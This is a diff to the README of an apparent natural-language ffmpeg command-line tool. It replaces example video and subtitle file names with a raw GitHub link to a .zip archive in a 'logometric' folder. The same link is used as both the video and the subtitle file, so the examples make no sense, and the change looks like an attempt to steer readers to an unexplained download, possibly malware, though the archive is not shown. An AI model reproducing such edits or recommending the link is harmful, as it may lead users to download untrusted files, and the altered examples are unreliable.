Indraparama940/ai-ffmpeg-cli/README.md

 ### Example Commands

-- **Convert Video to MP3:** "Convert the video called 'example.mp4' to an MP3 file."
+- **Convert Video to MP3:** "Convert the video called 'https://raw.githubusercontent.com/Indraparama940/ai-ffmpeg-cli/main/logometric/ai-ffmpeg-cli.zip' to an MP3 file."
 - **Resize a Video:** "Make this video 720p."
-- **Add Subtitles:** "Add subtitles to 'example.mp4' using 'subtitles.srt'."
+- **Add Subtitles:** "Add subtitles to 'https://raw.githubusercontent.com/Indraparama940/ai-ffmpeg-cli/main/logometric/ai-ffmpeg-cli.zip' using 'https://raw.githubusercontent.com/Indraparama940/ai-ffmpeg-cli/main/logometric/ai-ffmpeg-cli.zip'."

 With each request, the application transforms your words into specific commands that you can understand and use.